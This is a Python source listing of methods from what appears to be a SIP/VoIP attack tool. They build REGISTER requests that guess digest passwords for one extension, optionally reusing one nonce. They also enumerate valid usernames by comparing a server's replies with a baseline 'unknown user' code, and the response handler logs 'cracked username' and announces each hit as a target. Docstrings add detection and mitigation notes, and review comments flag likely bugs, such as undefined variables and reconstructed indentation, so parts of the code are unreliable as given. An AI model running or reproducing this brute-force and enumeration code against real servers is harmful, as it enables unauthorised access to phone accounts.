def genNextRequest(self):
    """
    Build the next REGISTER request of the digest-password guessing loop.

    First call: flags the test packet as generated and returns an
    unauthenticated REGISTER (CSeq 1) for self._username.

    Later calls: when self._challenges holds at least one entry, the next
    candidate is taken from self._scaniter and a REGISTER (CSeq 2) is built
    with an auth dict (username, realm, algorithm, nonce, proxy flag,
    candidate password). With self._reusenonce set, every attempt presents
    self._staticnonce / self._staticcallid instead of consuming a stored
    (nonce, call-id) pair. When no challenge is stored, the request is built
    with auth=None and CSeq 1.

    Returns ((target ip, target port), packet), or None once the candidate
    iterator is exhausted.

    Detection/mitigation view: on the wire this is a run of REGISTER
    requests for one extension, each answering a digest challenge; in the
    nonce-reuse mode they all carry the same nonce and Call-ID, so a
    registrar that issues single-use nonces, or throttles failed
    authentication per extension and source, limits it.
    """
    if not self._testpktgenerated:
        self._testpktgenerated = True
        self.logDebug('sending test request')
        probe = makeRequest('REGISTER',
                            self._targetip,
                            self._targetport,
                            self._xternalip,
                            self._localport,
                            extension=self._username,
                            cseqnum=1,
                            )
        return (self._targetip, self._targetport), probe

    if not len(self._challenges) > 0:
        # No stored challenge: plain request, no credentials.
        tag = None
        seq = 1
        auth = None
        callid = None
    else:
        # `.next()` is the Python 2 iterator call; the iterator object must
        # expose it for this to run.
        try:
            guess = self._scaniter.next()
        except StopIteration:
            return None
        self.logDebug('trying password: %s' % guess)
        # Fixed 4-byte second argument; how createTag combines the two
        # values is not visible in this listing.
        tag = createTag('%s:%s' % (self._username, guess), '\xDE\xAD\xBE\xEF')
        auth = {
            'username': self._username,
            'realm': self._realm,
            'algorithm': self._digestalgorithm,
        }
        if self._reusenonce:
            auth['nonce'] = self._staticnonce
            callid = self._staticcallid
        else:
            auth['nonce'], callid = self._challenges.pop()
        auth['proxy'] = self._targetisproxy
        auth['password'] = guess
        seq = 2

    # NOTE(review): toaddr, fromaddr and contact are not assigned anywhere in
    # this method as listed; unless they are module-level names this call
    # raises NameError -- confirm against the full file.
    attempt = makeRequest('REGISTER',
                          self._targetip,
                          self._targetport,
                          self._xternalip,
                          self._localport,
                          toaddr,
                          fromaddr,
                          extension=self._username,
                          callid=callid,
                          contact=contact,
                          cseqnum=seq,
                          localtag=tag,
                          auth=auth)
    return (self._targetip, self._targetport), attempt
def genNextRequest(self):
    """
    Build the next request of the username-enumeration loop.

    While self._BADUSERCODE is None, the request is a test packet addressed
    to a random 50-bit integer used as the username; the counter
    self._nb_test_pkts_generated is incremented for each one. Presumably the
    reply to such a packet supplies the status code the server uses for
    unknown users -- confirm against the response handler.

    Once self._BADUSERCODE is set, the username comes from self._scaniter
    instead. The same value fills the To, From and Contact addresses and the
    `extension` argument.

    Returns ((target ip, target port), packet), or None once the username
    iterator is exhausted.

    Detection/mitigation view: the traffic is one request per candidate
    username using self._currentmethod; the comparison only yields
    information when the server answers known and unknown users with
    different status codes.
    """
    if self._BADUSERCODE is not None:
        # `.next()` is the Python 2 iterator call; the iterator object must
        # expose it for this to run.
        try:
            nextusername = self._scaniter.next()
        except StopIteration:
            return None
    else:
        self._nb_test_pkts_generated += 1
        self.logDebug("generating test packet #%d for method '%s' .." % (
            self._nb_test_pkts_generated, self._currentmethod))
        nextusername = random.getrandbits(50)

    # To and From are the same address string.
    address = '"%s"<sip:%s@%s>' % (nextusername, nextusername, self._targetip)
    contact_uri = 'sip:%s@%s' % (nextusername, self._targetip)
    packet = makeRequest(self._currentmethod,
                         self._targetip,
                         self._targetport,
                         self._xternalip,
                         self._localport,
                         address,
                         address,
                         contact=contact_uri,
                         extension=nextusername)
    return (self._targetip, self._targetport), packet
def genNextRequest(self):
    """
    Build the request for the next (ip, port, method) tuple of the scan.

    Each tuple drawn from self._scaniter yields exactly one request with no
    credentials or extension set. Returns ((ip, port), packet), or None once
    the iterator is exhausted.
    """
    # `.next()` is the Python 2 iterator call; the iterator object must
    # expose it for this to run.
    try:
        target_ip, target_port, sip_method = self._scaniter.next()
    except StopIteration:
        return None
    packet = makeRequest(sip_method,
                         target_ip,
                         target_port,
                         self._xternalip,
                         self._localport,
                         )
    return (target_ip, target_port), packet
def pktCallback(self, srcaddr, pkt):
    """
    Handle one SIP response received from `srcaddr`.

    Phase 1 (self._BADUSERCODE is None): the response is treated as the
    answer to a test packet. Provisional/unavailable codes are ignored; a
    code from the listed set (OKAY, AUTHREQ, ...) is logged as fatal and
    self.set_currentmethod() is called; any other code is stored as
    self._BADUSERCODE. The method returns without classifying a username.

    Phase 2: the username is taken from the To header. A response whose code
    differs from self._BADUSERCODE is examined further: 2xx responses are
    ACKed when self._ackenabled is set, and the codes OKAY, AUTHREQ,
    PROXYAUTHREQ, INVALIDPASS and TEMPORARILYUNAVAILABLE record the username
    in self._doneusernames and announce it through self._pcallback (if set),
    tagged 'noauth' for OKAY and 'reqauth' otherwise.

    The classification rests entirely on the server answering known and
    unknown users with different status codes; when both get the same code
    every response falls into the final "failure response" branch.

    NOTE(review): block nesting is reconstructed from a listing that had
    lost its indentation -- confirm against the original file.
    """
    self._targetisalive = True
    metadata = parsePkt(pkt)
    if metadata['headers']['To'] is None:
        # self.logInfo("received failure response: %s" %(metadata['respfirstline']))
        return
    if self._BADUSERCODE is None:
        """ Perform a test 1st .. to find out what error code is returned for unknown users Quit if weird codes are returned (the SIP UAS must be sick or somethx \L/) """
        if metadata['code'] == TRYING \
                or metadata['code'] == RINGING \
                or metadata['code'] == UNAVAILABLE:
            # Not a final answer to the test packet; keep waiting.
            pass
        elif metadata['code'] == OKAY \
                or metadata['code'] == NOTALLOWED \
                or metadata['code'] == UNSUPPORTED \
                or metadata['code'] == NOTIMPLEMENTED \
                or metadata['code'] == INEXISTENTTRANSACTION \
                or metadata['code'] == NOTACCEPTABLE \
                or metadata['code'] == BADREQUEST \
                or metadata['code'] == PROXYAUTHREQ \
                or metadata['code'] == INVALIDPASS \
                or metadata['code'] == AUTHREQ \
                or metadata['code'] == TEMPORARILYUNAVAILABLE:
            # These codes are not accepted as the "unknown user" baseline.
            # set_currentmethod() is defined elsewhere; presumably it moves
            # on to another SIP method -- confirm.
            self.logWarning("SIP server (fatally) replied test packet with '%s'" %(metadata['respfirstline']))
            self.set_currentmethod()
        else:
            # Any other code becomes the baseline for "unknown user".
            self.logDebug("ok. server replied test packet with '%s'"%(metadata['respfirstline']))
            self._BADUSERCODE = metadata['code']
            self.logDebug("setting BADUSERCODE = %s" % self._BADUSERCODE)
        return
    # The To header comes from the remote peer. re.search() returns None when
    # the header contains no '<', and the .group() call below then raises
    # AttributeError.
    match = re.search("^(?P<username>.+?) *?<", metadata['headers']['To'])
    username = match.group('username').replace('"', '').replace("'", "")
    # NOTE(review): username, respfirstline and User-Agent originate in the
    # received packet and are logged / forwarded below as-is; whether
    # parsePkt sanitises them is not visible here.
    if metadata['code'] != self._BADUSERCODE:
        if username in self._doneusernames:
            # Already reported; ignore repeated responses for this username.
            return
        if (200 <= metadata['code'] < 300) and self._ackenabled: # ACKnowledge all 2XX (success!) responses
            if metadata['headers']['CSeq'] is None:
                # self.logDebug("received failure response: %s" %(metadata['firstline']))
                return
            # NOTE(review): the listing wraps inside this pattern right after
            # the space; it is reproduced on one line here -- confirm the
            # literal against the original file.
            match = re.search("^(?P<cseqnum>[0-9]+?) .+?", metadata['headers']['CSeq'])
            # assert is stripped under `python -O`; a malformed CSeq header
            # would then surface as AttributeError on the next line.
            assert match is not None # XXX dirty
            cseqnum = match.group('cseqnum')
            ackpkt = makeRequest('ACK',
                                 srcaddr[0],
                                 srcaddr[1],
                                 self._xternalip,
                                 self._localport,
                                 extension=username,
                                 callid=metadata['headers']['Call-ID'],
                                 cseqnum=cseqnum)
            self.logInfo("received (success) response '%s' for username '%s'" %(metadata['respfirstline'], username))
            self.logDebug("sending ACK ..")
            self.sendto(ackpkt, srcaddr)
        if metadata['code'] == OKAY \
                or metadata['code'] == AUTHREQ \
                or metadata['code'] == PROXYAUTHREQ \
                or metadata['code'] == INVALIDPASS \
                or metadata['code'] == TEMPORARILYUNAVAILABLE:
            # Codes this method counts as "user exists".
            self._doneusernames.append(username)
            authentication = 'reqauth'
            if metadata['code'] == OKAY:
                # The request succeeded without any authentication challenge.
                authentication = 'noauth'
            self.logInfo("cracked username: %s (response to '%s' request was '%s')" %(username,self._currentmethod,metadata['respfirstline']))
            if self._pcallback:
                self._pcallback.announceNewTarget(targets.TARGET_SIP_USER(ip=srcaddr[0],
                                                                          port=srcaddr[1],
                                                                          ua=metadata['headers']['User-Agent'],
                                                                          user=username,
                                                                          auth=authentication))
        else:
            # Differs from the baseline but is not one of the codes above.
            self.logInfo("received '%s' for username '%s'" %(metadata['respfirstline'], username))
    else:
        # Same code as the baseline: treated as "unknown user".
        self.logInfo("received failure response '%s' for username '%s'" %(metadata['respfirstline'], username))
        pass